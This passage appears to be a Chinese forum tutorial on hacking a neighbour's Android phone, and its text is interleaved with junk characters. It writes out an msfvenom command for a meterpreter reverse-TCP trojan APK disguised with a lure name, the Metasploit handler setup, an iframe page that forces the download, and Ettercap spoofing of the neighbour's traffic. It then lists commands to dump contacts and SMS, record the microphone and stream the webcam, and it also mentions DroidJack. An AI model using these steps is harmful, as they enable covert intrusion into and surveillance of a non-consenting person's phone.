|
9 W( o* g8 J2 |5 h
五、msf+ettercap入侵邻居安卓手机 & ]( Q1 z8 q$ @5 D9 {2 V
8 j" B& Z" R& q0 t0 s7 N0 ^
0 d! x/ ~* `( y( m# p0 K8 W 首先启动msf
. O/ I- m8 [( o% K: A2 U0 T
" R/ s0 ^& b( `2 z! M' P; m7 z3 v1 E* H- y
先用kali生成一个安卓木马,如下命令: : a9 q4 p1 |0 q7 T1 o8 @2 T& ]# m
3 Y% f; u$ T/ X2 |1 Q
' ^) g9 G9 c, a' S Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk + y7 W7 o# E7 S( {
! U- L; u9 s2 |/ j$ |% ~0 f) O2 ?
为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 & ~& Z2 u' e4 j
. o9 l: U) ?! W5 z- Q
# g* }# Y/ U, \& G$ } 然后进入msf
/ Z$ Y1 A2 q+ q- E2 |
- d0 c5 S2 d9 H: T' u) H) G, \' _% H& C& }1 B$ r# G) `
use exploit/multi/handler 8 y; I7 e& a. h. @& w/ g6 F5 O8 Z, W
* i! @7 Q* m$ i/ u* m4 R/ u
+ I3 x$ K* l7 r5 Z8 `4 V
set payload android/meterpreter/reverse_tcp - b/ z6 ] L; g7 x; V' _; z5 |
% J0 q% l$ X% F5 O _: W( p) J) G
* ^8 A0 ?2 g* y" p8 M$ ?- V; T7 s( E set LHOST 192.168.0.109 //ip为kaili的ip 6 ^: f5 K D3 E2 C1 f Z
* W1 U/ V% n) Q$ ]8 A6 R) Y& u* ^5 w& n& x( m4 M
set LPORT 44444 //端口一定要与前面生成的木马的端口一致 + g0 U! G2 E' t z
4 c4 C0 z8 {0 y' `
7 L( b7 _& I) U9 f Exploit
- B% r8 P2 Z, t
% E! ^/ b4 F: T/ _! j2 B" h$ f7 `
. h0 ~) h( t, \" ?) b1 U5 j # f% x4 N3 j( m# I* R$ r3 g
7 H9 D1 G" f- c3 j& I, e/ {/ J' X0 H3 n- S7 z4 T
下面我们开启ettercap -G
# ~* S3 F, O3 e. p( E4 w ) f4 r) _- w1 [
: s4 i9 H7 D. o& x 我物理IP为
d7 e; d! @3 M/ N& ]
, e! B9 X* B% {/ W/ Y t, p
4 F/ T% E5 D* n: C2 H
( Q4 H- O: m- k% a1 X! B' U 9 f. _1 A# @: U+ o5 _
1 Q' ]1 x/ Y! ?- t4 ]/ u3 W
别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, 6 \- O. X' L/ V6 ^$ ]
. u+ O& g) w4 A/ Z7 c
B7 M8 c5 Y( _ 下面我们来设置一下 ; K+ E9 S4 G4 F' I" y! Q
) _& C5 V7 O3 \. V- t \3 @4 L2 q! i- w) i) s9 g8 P9 e' X( a* _, a
" F3 U" V1 O8 F8 ]; X , Y, o8 U* |- j/ U" W p5 ~# [
+ D* l0 Y! V% ]' b" D
在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, 8 I/ x( @& A" x: h4 a8 Y" t. t
" W* g# p8 B8 B4 m& a) k" \: d0 V
! u- H! U0 z! |7 R: N+ }0 r' P, x ' w# ^7 j5 ]- A8 |
. Z" `- O# p. x$ H4 b/ U# _7 m3 X" a* h# [ G$ m# F. m
/ w& g, Y; X+ c
' r6 J- f; W R
+ z, P7 ~9 c; A1 r9 `9 C' {" X$ d
, ?" v/ J) R7 @$ }& E4 E 1 s/ w# I9 C8 y8 s( W% e
2 Y2 x3 K7 |$ C5 y
5 I3 J6 U- d* X4 j+ T" M8 @& G
+ C8 ^7 }2 d# v* |' a* Y5 D8 `' ]7 n' p8 v
4 q9 A2 }' d( F
% B U1 k$ x$ ~2 u3 f& L% K; m
2 t, |/ u5 p2 g! W$ O4 | ; `8 G! A8 |5 \* [0 B; k
: {- `& o+ \1 t7 X( L l+ B
1 ~( G% g" W! V8 R% H3 y
- Q/ g. |0 U6 h( F7 G& O * Z4 r, J3 }2 o* s* Q
1 k* T$ t3 ]" j9 M) {- G9 w
d3 R Q8 \) d5 A7 ?2 q
# s' W0 |9 u6 G7 A% B
; C% i" R1 x# w
( [, p1 ^9 Q% g# q7 g
1 @9 {0 {# x# I4 M; O
% E, p4 t7 O( P! H! I
% k: h4 g6 s* s- Y. M' \ ) n: l4 X7 X7 |+ X3 ~
# H+ ?5 J8 Z( v* i- N& M
) K* Y' }: f( ] ]$ c$ [- x# r
3 \, p+ z' x' E& a4 ?! |( T8 O) x4 w* E1 n
# P6 m* \ W2 E, `3 h' o5 s 1 m6 a8 u$ z( @6 n y
7 m5 k9 U: e; t" O+ M, K / F$ q: Z" c8 c d
M c* i& E& a7 \5 m* C4 `2 `4 M/ k6 }( L- b% i- q3 C
下面我们开始攻击
+ Q% I: g! U1 S
) c( F0 S6 b3 ?* {! z5 H$ ? ~; a7 l6 \
7 t% a- E. w1 C& F; n1 M+ ^ $ `) h( a0 F2 k5 t/ m4 U& M
# u! H, B* d( {; A1 n# q7 y1 j: h+ P
/ L* _! w0 c% F/ d# i } $ d- V9 H4 p/ R- \( a
0 G; K) Z* D. R7 X ' D6 [1 b% [: z; w6 O
# S3 k5 J2 N3 ?% V( K2 q+ e+ X* s5 M8 O8 x: `
) [4 C' E; n J! Y
* c. |8 k) r' L
! b- X1 G& @& y2 y! ~6 b1 Q
5 E5 N! z! `+ w9 \( M
, I6 u- z P1 U- B* e# J P5 W; }
6 j0 D m: b' c! j( g& n$ C, L 大概过了5分钟多,发现反弹成功了
; A! }3 z) y' O9 w % e B9 a. f% T7 h
- Y+ G( Q+ C% x
w7 e8 r$ }. {+ Y+ h + R9 z% A c/ v7 N( C$ [/ s% p
/ _, z9 c/ N y6 J# Q
8 B8 Z5 p* P9 [: a % q$ O, I: d- u8 t& ~
# ~6 w; ~: a% M7 R
) I7 @5 \1 g! }' R* A! S6 p/ m ! j3 n' H6 ?, C3 O: X, ^1 A
3 c( r, q W+ K' c$ t' o
4 \ [& q2 ~/ ^% D0 t: V6 t) o
" O. ` i9 j% d. E I: | W+ f) C8 M% E8 \
, I9 E' D, E9 E( a( S' Q3 J: `: ?3 K
5 @$ F! U; Y0 ^1 g6 H8 g
+ F2 s" V4 B( B8 N) Q- a/ r& i
} P5 K+ @2 h5 K- ^( G) u 3 _ Z: Q( q; \; B. G
$ x3 r$ w* {5 ]( t! A ! [; h! m; u4 n2 \6 Z
% f5 F+ n; S% P, `
* K+ \" u5 X2 Y" B! X; q
执行命令
% S) u; S2 G$ e. ~' o$ V4 e6 D
: P$ s& x. ~; s, W! a
/ J9 H, T7 T8 T$ v* l( f* j
1 l$ O, s$ d% H4 G/ Q 9 Y* i1 U5 R/ T* O* }
# A2 _& Q# {5 B# e
dump_contacts --》这个是导出电话 ( T4 D9 ^, I( ]
' `( n9 Z2 N) @% Z7 H. g! w. w, B4 s& K
dump_sms --》这个是导出信息
; i6 S6 S& f+ X
. @) J$ Z+ Y0 |0 S' q) U& z1 q* F4 n5 O/ k5 G& c
record_mic Record audio from the default microphone for X seconds 9 Q/ l3 U! L+ x* T+ P% `
% W( u% \ x$ U+ y& A8 f y2 u. m( U }% S: @
webcam_chat Start a video chat
/ e0 J2 W! C6 ?* D4 I% Q9 t 2 Y! I+ P* K4 h! K2 a: l0 k7 I
& w2 `$ R0 z# b1 w1 M0 L( Z, s webcam_list List webcams 0 _' z! u/ u& t0 E3 Q* y
, Z- u# }0 v4 R8 i( I, j" z/ W
webcam_snap Take a snapshot from the specified webcam
& J# Q5 D; z" Q( [# N ? 4 `7 W3 s. r9 I
1 b8 I9 [4 n3 f1 n& x. h webcam_stream   lay a video stream from the specified webcam # q% F! \. C/ L) L/ d) o" q5 u
# k8 V# T3 R, L2 _/ P( v7 V
6 E- ^+ M, v o# R& O* d
+ ]* m7 u& A) f, t
4 b+ ~& g. o P
3 i# K) T" x L3 @: e- s - L/ P$ e7 {7 Q+ |3 B$ i% t
3 ~9 `/ x3 X8 s D6 W/ b4 z! ], p! I0 h' c E/ c: e/ \
我们打开看一下电话薄, % W! W) f9 n( M+ {4 X' c
2 d3 ?( P Q& n' J0 r) r3 r. G' \& Q6 ?
" A) ~0 | h/ V1 h* v0 y
" f. n( C j% Q" [# }
- R& S% g( M" L8 `8 S+ u1 e, x3 h/ c' |6 v# H0 p A# Y9 y
+ [, m4 x/ I8 Q
, }( J* Y, H$ q& o
' p, ^- j( b% |2 F ) U C3 Q7 {5 r1 x5 j# @0 F, C
3 w$ @8 ?0 C- [+ a3 z2 p. S$ P, U
! v9 y$ A) J! s' Y6 f
3 U K+ j" t& ~+ `8 G" ~$ q
1 |; H {, c; ~0 O9 A# h% x3 ?
7 d* j7 }: J* e3 u# c
: d! ]: ~1 p% V, A$ [2 Y 0 z+ ?, q% {9 c5 h
8 x) \3 U) o3 N* c
& K4 h: W, {' z4 O; D4 _
; |1 N4 a) l9 ?7 a9 e- _0 ?4 j* _ C E* i. Q& c# y2 w
我们同时欺骗成DroidJack木马,使用方法如图:
/ W1 K. `: \+ Y
! J6 S7 ~6 k6 `! y
) O6 R- U; F/ h( Z4 U) W) ~
7 q' ?7 E0 F: u6 i
* G( ^ ^3 B: \* F* X% y% L' d8 M/ u5 H" ^) F5 Q
; K5 w7 V( T' {8 m
9 ^; P$ o+ O' Q1 U! V9 q2 }$ x
+ B( ~8 `: Q7 m8 w" a: x4 L4 Z' A 1 G; Q4 I; q: |9 w! p% c& {
; }! I$ } R+ i
/ |" v! J% M: f* q7 x- a6 K( [
切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口
; y7 i3 R4 `. q9 P9 _. S8 R N
0 G4 {0 F. y( Z( F! }; q! P- E
v% n# T$ R1 e$ v$ R$ O+ j , c2 G1 }! P4 g" q( e0 H5 k. x
0 \; p7 b9 s7 u* q, I9 U" ~$ e' R
% @6 \5 w. w7 Y) S2 Z
, l/ E0 p: O: _: S4 Q. B
* |9 u7 y9 B+ J! D0 }, i
7 s, f" f) T9 p
5 d$ n5 E; m; G( s8 ` : h- j+ S+ h4 s) r! K
- [& D D8 x% B* m4 v( K+ n$ m 
) i/ Y2 B3 D. o% _. v- O
1 K+ u5 @' s5 m" S8 q6 C4 J% j2 o& r& a
. G. k# A- p0 k: T8 A. m5 F2 Z
|